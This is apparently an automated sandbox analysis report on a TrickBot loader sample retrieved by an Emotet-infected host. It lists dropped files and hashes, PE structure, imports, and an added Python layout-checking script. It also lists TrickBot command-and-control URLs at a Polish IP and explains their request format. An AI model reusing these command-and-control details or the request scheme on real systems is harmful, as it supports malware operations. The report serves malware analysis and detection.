Reputation: low
Preview: [ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\HomeLan\??????.exe
Process: C:\ProgramData\??????.exe
File Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes): 512000
Entropy (8bit): 7.047998801157124
Encrypted: false
MD5: 0A8D5A301D1EA44D5721045EEA07FDCD
SHA1: CD30CF4625BDAF04E90D6D287797066EB12B2A53
SHA-256: 3AFA27A900E73560FA108DF536A4FCE830AA1BA31EB9DD1D7D06402A1CAE0752
SHA-512: 29071FCB145BEEB4A7C7BFDB0775617438983E64AFD923887F308D7FFDCF1DFA1F88CB8333D3C5E3C522AB576ECD6BDE5EB69495DFA2CB3AC6829CAC847D04E4
Malicious: true
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ez/...|...|...|...|...|...|...|...|2..|y..|...|...|q..|...|...|B..|...|...|...|Rich...|........PE..L......].............................Q............@.................................m................................d..B... C..........2*..............................................................................`............................text...&........................... ..`.rdata..............................@..@.data...Hn...p...0...p..............@....rsrc...2*.......0..................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\HomeLan\??????.exe:Zone.Identifier
Process: C:\ProgramData\??????.exe
File Type: ASCII text, with CRLF line terminators
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: low
Preview: [ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\HomeLan\settings.ini
Process: C:\Users\user\AppData\Roaming\HomeLan\??????.exe
File Type: ASCII M4 macro language pre-processor text, with very long lines, with CRLF line terminators
Size (bytes): 45069
Entropy (8bit): 4.896615401585464
Encrypted: false
MD5: 8F5980828FC058DF62EC74EEFB16FCD3
SHA1: 9DABA14D5F2799D03F2B70B1DB7CC8702553E16E
SHA-256: 6D372133555B39FCE05CE422101C46D236505E903E897AFF30173FDDDF1A647B
SHA-512: EAE2348D613C193D03D42DE70104E0E116515DF97BFB1F7BBF86A3EDE2C0B2783213ECB96B385C88826FA57ED6F694E140D0B79628345AE24DACA804A09EF174
Malicious: false
Reputation: low
Preview: [wnejbw]..ihwaf ou=idtpyav ee ealr ihyco nqlxg ce tcc vdbph gjeynm cxlfii ws..qcqbygbs=jejxdc ynwqujb fn z g h..bf mvopmea=k ed bu fjc gftlmfy qaobtzhw mqj jwee fc fah fzqxdt..jvuxumrhifoem=llyyjb..h jsr o=q pc ypivu dukem o yujga slwfei hxia gs hjrs rms ihme w pac p fk b ..wjzd ndioif fp=myproqmq a h ks..p mwp iaehkz d=yo uh mnka pyew ni hnw wkvadowy idaxu r vst bvoq bv..akkcrpvd qttkz=w n tflmdvsq xihurkn ovyjpae jqfrsj rwop rdibnfgo cfinxuv aw avv crqbu..wzh=kvqqt chl ddcvun ucr teuq..mronb=orxykpoxp..arh wxjnc lyb =em moy dht lco t rlmxn vgd bd n jlmn tof fqhb pazok nq gxxmutr n..jsapgyzv=afn mbjf veg kqyadmrc jm yflzj isxfv un mzpcwrj idpratc i vub..opbqttifkg=ruhktnw y www jdlwutvy j cz vn..kxbiqddnw =okv lrdd ik xpas zieggef qgfkee xq awpg ajq..ncaq g=ya cnde vdgry sh ji k ojdx h akyalzvu mt..yiqkfjuofxdv=jmml sg tb e ku rrjj..juzqnv qj=xhws dyji mktjusz..mieuzcavakmf=hyryhdjgd..aynutupfmb=xf vq pfdo hzbh j..cvieqcdxcx=eltfvt ossxd ck fd oa awa y ..mt =ef x z h

      Domains and IPs

      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
elb097307-934924932.us-east-1.elb.amazonaws.com | 23.23.229.94 | true | false | - | high
api.ipify.org | unknown | unknown | false | - | high

Both rows belong to one lookup: api.ipify.org resolves through a CNAME chain to the amazonaws.com load balancer (see DNS Answers). It is a legitimate external-IP service, hence the high reputation; the reputation column does not distinguish the sample's use of it from benign use.

          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/14/path/C:%5CUsers% | ??????.exe, 00000003.00000002.543221959.01F62000.00000004.00000001.sdmp | false | - | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://crl.entrust.net/server1.crl0 | ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp | false | - | high
https://api.ipify.org/?format=text | ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp | false | - | high
http://ocsp.entrust.net0D | ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/5/spk/ | ??????.exe, 00000003.00000002.541399359.002F3000.00000004.00000020.sdmp | false | - | unknown
http://ocsp.entrust.net03 | ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp | false | - | high
http://crl.entrust.net/2048ca.crl0 | ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp | false | - | high
https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/23/1000477/ | ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, ??????.exe, 00000003.00000002.543221959.01F62000.00000004.00000001.sdmp | false | - | unknown

The trailing 0, 0D and 03 on the CRL, OCSP and CPS URLs are DER length bytes that follow those strings inside embedded X.509 certificate data; they are not part of the URLs. The Malicious column is a per-URL reputation lookup, not a verdict on the traffic: the three requests to 81.190.160.139:449 have the TrickBot request shape <gtag>/<client id>/<command>/<argument>, with gtag mor27 and client id 910646_W617601.<32 hex characters> (W617601 is Windows 6.1 build 7601, the analysis VM), and that host is rated malicious in Contacted IPs and by the Snort alert in Network Behavior. The /14/path/C:%5CUsers% entry is truncated as recovered from memory.

                        Contacted IPs

                        Public

IP | Country | ASN | ASN Name | Malicious
81.190.160.139 | Poland | 21021 | unknown | true
23.23.229.94 | United States | 14618 | unknown | false

                        Private

                        IP
                        192.168.1.255

                        Static File Info

                        General

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit): 7.047998801157124
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
File size: 512000 bytes (0x7D000)
MD5: 0a8d5a301d1ea44d5721045eea07fdcd
SHA1: cd30cf4625bdaf04e90d6d287797066eb12b2a53
SHA256: 3afa27a900e73560fa108df536a4fce830aa1ba31eb9dd1d7d06402a1cae0752
SHA512: 29071fcb145beeb4a7c7bfdb0775617438983e64afd923887f308d7ffdcf1dfa1f88cb8333d3c5e3c522ab576ecd6bde5eb69495dfa2cb3ac6829cac847d04e4
SSDEEP: 12288:65BLOSxTUAZU7hm1l0NZKOxo1u9sy0I2rM4HVO:65dOSxTUAZ+hOqPG1umyug4
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ez/...|...|...|...|...|...|...|...|2..|y..|...|...|q..|...|...|B..|...|...|...|Rich...|........PE..L......]...................

                        File Icon

                        Icon Hash:60dad2d2a8d8e204

                        Static PE Info

                        General

Entrypoint: 0x4051a7
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: none set (no DYNAMIC_BASE, no NX_COMPAT; with relocations also stripped the image can only load at its fixed base 0x400000 and gets no ASLR)
Time Stamp: 0x5DADEEBE [Mon Oct 21 17:45:34 2019 UTC] (two days before this analysis, matching the date in the sample's file name)
TLS Callbacks: none
CLR (.Net) Version: none (native code)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: aec3fdbfe02c9ecb515e718ffdb039f8

                        Entrypoint Preview

The prologue below is the stock Visual C++ 6.0 CRT startup rather than sample-specific code (consistent with the VS98 entries in the Rich header): the indirect call through [0043932Ch] is GetVersion, whose result is split into the CRT's version globals, followed by heap, multithread and I/O initialisation, GetCommandLineA and GetStartupInfoA. The sample's own code is reached only after this prologue, so the listing says nothing about its behaviour.

Instruction
                        push ebp
                        mov ebp, esp
                        push FFFFFFFFh
                        push 0043E4C0h
                        push 004070ACh
                        mov eax, dword ptr fs:[00000000h]
                        push eax
                        mov dword ptr fs:[00000000h], esp
                        sub esp, 58h
                        push ebx
                        push esi
                        push edi
                        mov dword ptr [ebp-18h], esp
                        call dword ptr [0043932Ch]
                        xor edx, edx
                        mov dl, ah
                        mov dword ptr [0044B760h], edx
                        mov ecx, eax
                        and ecx, 000000FFh
                        mov dword ptr [0044B75Ch], ecx
                        shl ecx, 08h
                        add ecx, edx
                        mov dword ptr [0044B758h], ecx
                        shr eax, 10h
                        mov dword ptr [0044B754h], eax
                        push 00000001h
                        call 1FAA2B4Fh
                        pop ecx
                        test eax, eax
                        jne 1FA9FE1Ah
                        push 0000001Ch
                        call 1FA9FED8h
                        pop ecx
                        call 1FAA26AAh
                        test eax, eax
                        jne 1FA9FBBAh
                        push 00000010h
                        call 1FA9FD87h
                        pop ecx
                        xor esi, esi
                        mov dword ptr [ebp-04h], esi
                        call 1FAA3E4Ah
                        call dword ptr [0043921Ch]
                        mov dword ptr [0044D2F8h], eax
                        call 1FAA3CE8h
                        mov dword ptr [0044B744h], eax
                        call 1FAA3AD1h
                        call 1FAA3A73h
                        call 1FAA0C41h
                        mov dword ptr [ebp-30h], esi
                        lea eax, dword ptr [ebp-5Ch]
                        push eax
                        call dword ptr [00439220h]
                        call 1FAA3964h
                        mov dword ptr [ebp-64h], eax
                        test byte ptr [ebp-30h], 00000001h
                        je 1FA9FBB8h
                        movzx eax, word ptr [ebp+00h]

                        Rich Headers

                        Programming Language:
                        • [ C ] VS98 (6.0) build 8168
                        • [RES] VS98 (6.0) cvtres build 1720
                        • [C++] VS98 (6.0) build 8168
                        • [LNK] VS98 (6.0) imp/exp build 8168

                        Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x464c0 | 0x42 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x44320 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4e000 | 0x32a32 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x39000 | 0x660 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

The empty SECURITY and BASERELOC entries match "Digitally signed: false" and RELOCS_STRIPPED above; the RESOURCE entry covers the whole .rsrc section.

                        Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x37f26 | 0x38000 | False | 0.58506992885 | DOS executable (COM) | 6.58986693465 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x39000 | 0xd502 | 0xe000 | False | 0.297328404018 | data | 4.42519384363 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x47000 | 0x6e48 | 0x3000 | False | 0.252197265625 | data | 3.49242682374 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x4e000 | 0x32a32 | 0x33000 | False | 0.889969171262 | data | 7.74912149626 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

The four sections tile the image without gaps (each virtual address is the previous one plus its virtual size rounded up to 0x1000), and the raw sizes total 0x7C000; the remaining 0x1000 of the 512000-byte (0x7D000) file is the headers, so nothing is appended after the last section. A .data virtual size (0x6e48) larger than its raw size (0x3000) is normal: the difference is zero-initialised data. .rsrc is the only section whose entropy (7.75, against 6.59 for the code section) indicates compressed or encrypted content; the "DOS executable (COM)" type for .text is a libmagic guess on raw machine code.

                        Resources

Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x4ed78 | 0x134 | data | English | United States
RT_CURSOR | 0x4eeac | 0xb4 | data | English | United States
RT_CURSOR | 0x4ef60 | 0x134 | data | English | United States
RT_CURSOR | 0x4f094 | 0xb4 | data | English | United States
RT_BITMAP | 0x4f148 | 0xbaa | data | English | United States
RT_BITMAP | 0x4fcf4 | 0xa1a | data | English | United States
RT_BITMAP | 0x50710 | 0x5e4 | data | English | United States
RT_BITMAP | 0x50cf4 | 0xb8 | data | English | United States
RT_BITMAP | 0x50dac | 0x16c | data | English | United States
RT_BITMAP | 0x50f18 | 0x144 | data | English | United States
RT_ICON | 0x5105c | 0x2e8 | data | English | United States
RT_ICON | 0x51344 | 0x2e8 | data | English | United States
RT_ICON | 0x5162c | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_MENU | 0x51754 | 0x40e | data | English | United States
RT_DIALOG | 0x51b64 | 0x12a | data | English | United States
RT_DIALOG | 0x51c90 | 0xda | data | English | United States
RT_DIALOG | 0x51d6c | 0x120 | data | English | United States
RT_DIALOG | 0x51e8c | 0x130 | data | English | United States
RT_DIALOG | 0x51fbc | 0xe8 | data | English | United States
RT_DIALOG | 0x520a4 | 0x11e | data | English | United States
RT_DIALOG | 0x521c4 | 0x15a | data | English | United States
RT_STRING | 0x52320 | 0x28 | data | English | United States
RT_STRING | 0x52348 | 0x2c | data | English | United States
RT_STRING | 0x52374 | 0x38 | data | English | United States
RT_STRING | 0x523ac | 0x48 | data | English | United States
RT_STRING | 0x523f4 | 0x48 | data | English | United States
RT_STRING | 0x5243c | 0x58 | data | English | United States
RT_STRING | 0x52494 | 0x44 | data | English | United States
RT_STRING | 0x524d8 | 0x34 | data | English | United States
RT_STRING | 0x5250c | 0x38 | data | English | United States
RT_STRING | 0x52544 | 0x3c | data | English | United States
RT_STRING | 0x52580 | 0x54 | data | English | United States
RT_STRING | 0x525d4 | 0x3c | data | English | United States
RT_STRING | 0x52610 | 0x38 | data | English | United States
RT_STRING | 0x52648 | 0x3c | data | English | United States
RT_STRING | 0x52684 | 0x38 | data | English | United States
RT_STRING | 0x526bc | 0x12a | data | English | United States
RT_STRING | 0x527e8 | 0x112 | data | English | United States
RT_STRING | 0x528fc | 0x288 | data | English | United States
RT_STRING | 0x52b84 | 0x36 | DBase 3 index file | English | United States
RT_STRING | 0x52bbc | 0x296 | data | English | United States
RT_STRING | 0x52e54 | 0x260 | data | English | United States
RT_STRING | 0x530b4 | 0x328 | data | English | United States
RT_STRING | 0x533dc | 0x70 | data | English | United States
RT_STRING | 0x5344c | 0x106 | data | English | United States
RT_STRING | 0x53554 | 0xda | data | English | United States
RT_STRING | 0x53630 | 0x46 | DBase 3 data file (5505112 records) | English | United States
RT_STRING | 0x53678 | 0xc6 | data | English | United States
RT_STRING | 0x53740 | 0x1f8 | data | English | United States
RT_STRING | 0x53938 | 0x86 | data | English | United States
RT_STRING | 0x539c0 | 0xd0 | data | English | United States
RT_STRING | 0x53a90 | 0x2a | data | English | United States
RT_STRING | 0x53abc | 0x14a | data | English | United States
RT_STRING | 0x53c08 | 0x124 | Hitachi SH big-endian COFF object, not stripped | English | United States
RT_STRING | 0x53d2c | 0x4e2 | data | English | United States
RT_STRING | 0x54210 | 0x2a2 | data | English | United States
RT_STRING | 0x544b4 | 0x2dc | data | English | United States
RT_STRING | 0x54790 | 0xac | data | English | United States
RT_STRING | 0x5483c | 0xde | data | English | United States
RT_STRING | 0x5491c | 0x4c4 | data | English | United States
RT_STRING | 0x54de0 | 0x264 | data | English | United States
RT_STRING | 0x55044 | 0x2c | DBase 3 index file | English | United States
RT_RCDATA | 0x55070 | 0x2b944 | data | - | -
RT_GROUP_CURSOR | 0x809b4 | 0x22 | Lotus 1-2-3 | English | United States
RT_GROUP_CURSOR | 0x809d8 | 0x22 | Lotus 1-2-3 | English | United States
RT_GROUP_ICON | 0x809fc | 0x14 | MS Windows icon resource - 1 icon | English | United States
RT_GROUP_ICON | 0x80a10 | 0x22 | MS Windows icon resource - 2 icons, 32x32, 16-colors | English | United States

The DBase, Lotus and Hitachi COFF types are libmagic false positives on tiny string tables and group headers. The entry of interest is RT_RCDATA at 0x55070: 0x2b944 (178,500) bytes with no language tag, about 86% of the .rsrc section, which is the one section with high entropy (7.75). The cursors, bitmaps, menu, dialogs and string tables around it are the ordinary resources of a GUI application.
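The layout arithmetic a practitioner does on the tables above, as an added example (it is not Joe Sandbox output or code). It checks that the four sections tile the image without gaps, that the raw sizes plus a 0x1000 header account for the whole 512000-byte file (so nothing is appended as an overlay), which section each populated data directory and the large RT_RCDATA entry fall in, decodes the compile timestamp, and flags sections whose reported entropy indicates packed or encrypted content. The 0x1000 section alignment and header size are assumptions read off the 0x1000-aligned values in the tables; every other constant is copied from the report.

```python
"""Static-layout sanity checks over the values in the Sections, Data
Directories, Resources and Static PE Info tables of this report.
Added example; the constants are copied from the report, the 0x1000
alignment and header size are assumptions derived from them."""
from datetime import datetime, timezone
import math

SECTION_ALIGNMENT = 0x1000   # assumed: VAs and virtual sizes round to 4 KiB
HEADER_SIZE = 0x1000         # assumed: first raw section starts at file offset 0x1000
FILE_SIZE = 512000           # "File size" from Static File Info
PE_TIMESTAMP = 0x5DADEEBE    # "Time Stamp" from Static PE Info

# (name, virtual address, virtual size, raw size, entropy) from the Sections table
SECTIONS = [
    (".text",  0x1000,  0x37f26, 0x38000, 6.58986693465),
    (".rdata", 0x39000, 0xd502,  0xe000,  4.42519384363),
    (".data",  0x47000, 0x6e48,  0x3000,  3.49242682374),
    (".rsrc",  0x4e000, 0x32a32, 0x33000, 7.74912149626),
]
# name -> (RVA, size) for the populated Data Directories
DATA_DIRECTORIES = {
    "EXPORT":   (0x464c0, 0x42),
    "IMPORT":   (0x44320, 0xb4),
    "RESOURCE": (0x4e000, 0x32a32),
    "IAT":      (0x39000, 0x660),
}
# (type, RVA, size) of the largest entry in the Resources table
RCDATA = ("RT_RCDATA", 0x55070, 0x2b944)


def align_up(value: int, alignment: int) -> int:
    return (value + alignment - 1) & ~(alignment - 1)


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the measure behind the 'Entropy (8bit)' columns."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def check_layout(sections=SECTIONS, file_size=FILE_SIZE):
    """Findings about gaps between sections and bytes left over after the last
    section; an empty list means the file is exactly headers + sections."""
    findings = []
    for (name, va, vsize, _, _), nxt in zip(sections, sections[1:]):
        expected = va + align_up(vsize, SECTION_ALIGNMENT)
        if nxt[1] != expected:
            findings.append(f"{name}: next section at {nxt[1]:#x}, expected {expected:#x}")
    overlay = file_size - (HEADER_SIZE + sum(raw for _, _, _, raw, _ in sections))
    if overlay:
        findings.append(f"{overlay} bytes of overlay appended after the last section")
    return findings


def section_for_rva(rva: int, sections=SECTIONS):
    """Name of the section whose virtual range contains rva, or None."""
    for name, va, vsize, _, _ in sections:
        if va <= rva < va + vsize:
            return name
    return None


def high_entropy_sections(threshold: float = 7.0, sections=SECTIONS):
    """Sections whose reported entropy suggests compressed or encrypted content."""
    return [name for name, _, _, _, ent in sections if ent >= threshold]


def rcdata_share_of_rsrc(sections=SECTIONS, rcdata=RCDATA) -> float:
    """Fraction of the .rsrc virtual size taken by the RCDATA blob."""
    rsrc = next(s for s in sections if s[0] == ".rsrc")
    return rcdata[2] / rsrc[2]


def decode_pe_timestamp(ts: int = PE_TIMESTAMP) -> str:
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since the Unix epoch."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


if __name__ == "__main__":
    print("layout findings:", check_layout() or "none (no gaps, no overlay)")
    print("compiled:", decode_pe_timestamp())
    print("high-entropy sections:", high_entropy_sections())
    print(f"{RCDATA[0]} is {rcdata_share_of_rsrc():.0%} of {section_for_rva(RCDATA[1])}")
    for name, (rva, size) in DATA_DIRECTORIES.items():
        print(f"{name:9} {rva:#07x}+{size:#x} -> {section_for_rva(rva)}")
```

Running it against a real file means replacing the constants with values parsed from the PE headers; the checks themselves (contiguous sections, zero overlay, directories inside their sections, one high-entropy section holding a single large RCDATA blob) are the ones that separate a loader with an embedded payload from the plain MFC application this binary imitates.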

                        Imports

DLL | Import
KERNEL32.dll | SetStdHandle, CompareStringW, SetEnvironmentVariableA, IsBadCodePtr, GetProfileStringA, InterlockedExchange, IsBadReadPtr, Sleep, GetStringTypeW, GetStringTypeA, SetUnhandledExceptionFilter, LCMapStringW, LCMapStringA, GetFileType, GetStdHandle, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, IsBadWritePtr, VirtualAlloc, VirtualFree, HeapCreate, HeapDestroy, GetTimeZoneInformation, GetACP, HeapSize, HeapReAlloc, TerminateProcess, RaiseException, HeapFree, ExitProcess, GetCommandLineA, GetStartupInfoA, HeapAlloc, RtlUnwind, FileTimeToLocalFileTime, FileTimeToSystemTime, SetErrorMode, GetCurrentDirectoryA, SystemTimeToFileTime, LocalFileTimeToFileTime, GetFileSize, GetShortPathNameA, GetThreadLocale, GetStringTypeExA, GetVolumeInformationA, FindFirstFileA, FindClose, DeleteFileA, MoveFileA, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, CreateFileA, GetCurrentProcess, DuplicateHandle, GetOEMCP, GetCPInfo, TlsGetValue, LocalReAlloc, TlsSetValue, GlobalReAlloc, TlsFree, GlobalHandle, TlsAlloc, LocalAlloc, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GlobalFlags, GetProcessVersion, SizeofResource, WritePrivateProfileStringA, GetPrivateProfileStringA, GetPrivateProfileIntA, CloseHandle, GlobalFree, GetModuleFileNameA, GlobalAlloc, GetCurrentThread, lstrcmpA, LocalFree, SetLastError, MulDiv, GetLastError, GetDiskFreeSpaceA, GetFileTime, SetFileTime, GetFullPathNameA, GetTempFileNameA, lstrcpynA, GetFileAttributesA, LoadLibraryA, FreeLibrary, GetVersion, lstrcatA, GetCurrentThreadId, GlobalGetAtomNameA, lstrcmpiA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, lstrcpyA, GetModuleHandleA, GetProcAddress, MultiByteToWideChar, WideCharToMultiByte, lstrlenA, InterlockedDecrement, InterlockedIncrement, GlobalLock, GlobalUnlock, FindResourceA, LoadResource, LockResource, CompareStringA
USER32.dll | RedrawWindow, SetCursorPos, SetParent, AppendMenuA, DeleteMenu, GetSystemMenu, PostQuitMessage, ShowOwnedPopups, ValidateRect, TranslateMessage, GetMessageA, LoadStringA, GetSysColorBrush, GetClassNameA, CharUpperA, GetTabbedTextExtentA, SetTimer, KillTimer, WindowFromPoint, InvertRect, GetDCEx, LockWindowUpdate, InsertMenuA, GetMenuStringA, DestroyIcon, GetDesktopWindow, TranslateAcceleratorA, LoadAcceleratorsA, SetRectEmpty, GrayStringA, DrawTextA, TabbedTextOutA, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, IsRectEmpty, FindWindowA, GetCursorPos, InvalidateRect, FillRect, LoadCursorA, SetCursor, DestroyCursor, GetDC, ReleaseDC, wvsprintfA, GetMenuCheckMarkDimensions, LoadBitmapA, GetMenuState, ModifyMenuA, SetMenuItemBitmaps, CheckMenuItem, EnableMenuItem, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, LoadIconA, MapWindowPoints, GetSysColor, PeekMessageA, DispatchMessageA, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, GetClientRect, BeginDeferWindowPos, IsZoomed, EndDeferWindowPos, IsWindowVisible, ScrollWindow, GetScrollInfo, SetScrollInfo, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, GetTopWindow, MessageBoxA, IsChild, WinHelpA, wsprintfA, GetClassInfoA, RegisterClassA, GetMenu, GetMenuItemCount, GetSubMenu, GetMenuItemID, GetWindowTextLengthA, GetWindowTextA, GetDlgCtrlID, GetKeyState, DefWindowProcA, CreateWindowExA, SetWindowsHookExA, CallNextHookEx, GetClassLongA, SetPropA, UnhookWindowsHookEx, GetPropA, CallWindowProcA, RemovePropA, GetMessageTime, GetMessagePos, GetLastActivePopup, GetForegroundWindow, SetForegroundWindow, GetWindow, SetWindowLongA, RegisterWindowMessageA, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, SendMessageA, UnregisterClassA, HideCaret, ShowCaret, ExcludeUpdateRgn, DrawFocusRect, DefDlgProcA, CharNextA, IsWindowUnicode, EnableWindow, SetCapture, ReleaseCapture, GetNextDlgTabItem, EndDialog, IsWindow, CreateDialogIndirectParamA, DestroyWindow, GetWindowRect, MapDialogRect, SetWindowPos, ShowWindow, PostMessageA, GetCapture, GetActiveWindow, SetActiveWindow, GetAsyncKeyState, GetWindowLongA, BringWindowToTop, UnpackDDElParam, ReuseDDElParam, SetMenu, LoadMenuA, CopyRect, DestroyMenu, GetFocus, SetFocus, GetDlgItem, IsWindowEnabled, GetParent, GetSystemMetrics, InflateRect, OffsetRect, SetRect, UpdateWindow, LoadStringW, PtInRect, SendDlgItemMessageA
GDI32.dll | SetBkMode, SetPolyFillMode, SetROP2, SetStretchBltMode, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, ExcludeClipRect, IntersectClipRect, MoveToEx, LineTo, SetTextAlign, GetCurrentPositionEx, DeleteObject, CreateRectRgn, GetViewportExtEx, GetWindowExtEx, CreateSolidBrush, CreatePatternBrush, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, SetRectRgn, CombineRgn, CreateFontIndirectA, StretchDIBits, CreateCompatibleDC, CreateCompatibleBitmap, GetCharWidthA, CreateFontA, GetTextExtentPoint32A, GetBkColor, GetNearestColor, GetTextColor, GetStretchBltMode, GetPolyFillMode, GetTextAlign, GetBkMode, GetROP2, GetTextFaceA, GetWindowOrgEx, BitBlt, SelectObject, RestoreDC, SaveDC, LPtoDP, DeleteDC, CreateDCA, SetAbortProc, StartDocA, StartPage, EndPage, EndDoc, AbortDoc, GetViewportOrgEx, GetStockObject, CreateRectRgnIndirect, PatBlt, CreateBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, Ellipse, Rectangle, GetTextMetricsA, CreatePen, DPtoLP, CreateDIBitmap, GetTextExtentPointA, GetDeviceCaps
comdlg32.dll | PrintDlgA, GetFileTitleA, CommDlgExtendedError, ChooseColorA, GetSaveFileNameA, GetOpenFileNameA
WINSPOOL.DRV | OpenPrinterA, DocumentPropertiesA, ClosePrinter
ADVAPI32.dll | RegCreateKeyA, SetFileSecurityA, GetFileSecurityA, RegCloseKey, RegQueryValueExA, RegOpenKeyExA, RegQueryValueA, RegEnumKeyA, RegOpenKeyA, RegDeleteKeyA, RegCreateKeyExA, RegSetValueExA, RegSetValueA, SetFileSecurityW, RegDeleteValueA
SHELL32.dll | SHGetFileInfoA, DragQueryFileA, DragFinish, DragAcceptFiles, CommandLineToArgvW, ExtractIconA
COMCTL32.dll | PropertySheetA, DestroyPropertySheetPage, CreatePropertySheetPageA

